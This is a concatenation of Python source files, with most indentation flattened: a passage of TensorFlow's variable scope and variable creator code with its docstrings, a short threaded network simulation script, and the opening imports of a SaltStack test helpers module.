caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong the current variable scope:
# create a VariableScope whose name extends the current one, inheriting
# reuse and initializer (except where the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as `mul`. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are generated
only on a per-thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For example:
```python
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect once, when the scope is created. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
finally:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
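# A minimal migration sketch for the deprecation warning above (hedged: the
# tensors `a`, `b` and the name "MyOp" are hypothetical placeholders; defining
# this helper has no side effects).
def _variable_op_scope_migration_example(a, b):
  """Shows the deprecated call next to its `variable_scope` equivalent."""
  # Deprecated ordering: values first, then name_or_scope, then default_name.
  with variable_op_scope([a, b], None, "MyOp"):
    pass
  # Preferred form: name_or_scope first, values passed as a keyword.
  with variable_scope(None, default_name="MyOp", values=[a, b]):
    pass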
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition; must be fully defined and
have rank of at least 1.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with one element per dimension, each >= 1 and at most one > 1.
The index of that element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
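# A hedged sketch (similar in spirit to `tf.compat.v1.fixed_size_partitioner`,
# but not part of this module) of a partitioner that satisfies the contract
# `_call_partitioner` validates: one entry per dimension, all >= 1, and at
# most one entry > 1.
def _example_axis0_partitioner(num_shards):
  """Returns a partitioner that splits a variable along its first axis."""
  def _partitioner(shape, dtype):
    del dtype  # Unused: the contract only constrains the returned list.
    return [num_shards] + [1] * (shape.ndims - 1)
  return _partitioner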
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
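# A small worked example (a sketch for illustration, not public API) of how
# the two helpers above cooperate: partitioning shape [10, 4] along axis 0
# into 3 slices spreads the one excess row over the first slice.
def _partitioning_helpers_example():
  slicing = [3, 1]  # e.g. what a partitioner returned for a rank-2 variable
  slice_dim, num_slices = _get_slice_dim_and_num_slices(slicing)
  # slice_dim == 0, num_slices == 3
  return list(_iter_slices([10, 4], num_slices, slice_dim))
  # -> [([0, 0], [4, 4]), ([4, 0], [3, 4]), ([7, 0], [3, 4])]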
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
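# A sketch of the late-binding pitfall `_make_getter` works around. In a loop
# such as:
#
#   for custom in custom_getters:
#     getter = lambda **kwargs: custom(getter, **kwargs)   # broken
#
# the lambda closes over the *names* `custom` and `getter`, not their current
# values, so every wrapper would see the last creator (and recurse into
# itself). Routing the values through `_make_getter`'s arguments freezes them:
#
#   for custom in custom_getters:
#     getter = _make_getter(custom, getter)                # correct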
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
If a creator does want to create a variable, it should eventually call
next_creator rather than calling Variable or ResourceVariable directly;
this keeps creators composable. A creator may choose to create multiple
variables, return already existing variables, or simply register that a
variable was created and defer to the next creators in line. Creators can
also modify the keyword arguments seen by the next creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in `kwargs` are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
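# A hedged sketch of a composable creator (the caching device below is an
# arbitrary illustrative choice): it rewrites one keyword argument and defers
# the actual creation to `next_creator`, as the contract above requires.
def _example_caching_creator(next_creator, **kwargs):
  """Forces every variable created under the scope onto a caching device."""
  kwargs["caching_device"] = "/cpu:0"
  return next_creator(**kwargs)
# Usage: with variable_creator_scope_v1(_example_caching_creator): ...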
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
If a creator does want to create a variable, it should eventually call
next_creator rather than calling Variable or ResourceVariable directly;
this keeps creators composable. A creator may choose to create multiple
variables, return already existing variables, or simply register that a
variable was created and defer to the next creators in line. Creators can
also modify the keyword arguments seen by the next creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in `kwargs` are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network.Host(1)
object_L.append(client)
server = network.Host(2)
object_L.append(server)
router_a = network.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data send mucho dataaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa %d' % i)
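# Back-of-the-envelope check (a sketch; the actual segmentation and header
# size live in the network module, which this script does not inspect): each
# payload above is roughly 80 characters, so with an MTU of 50 every send
# needs at least ceil(80 / 50) = 2 link-layer packets, more once header
# bytes are counted.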
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
helpers.py
|
# -*- coding: utf-8 -*-
'''
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
'''
# pylint: disable=repr-flag-used-in-string,wrong-import-order
# Import Python libs
from __future__ import absolute_import
import base64
import errno
import functools
import inspect
import logging
import os
import random
import signal
import socket
import string
import sys
import threading
import time
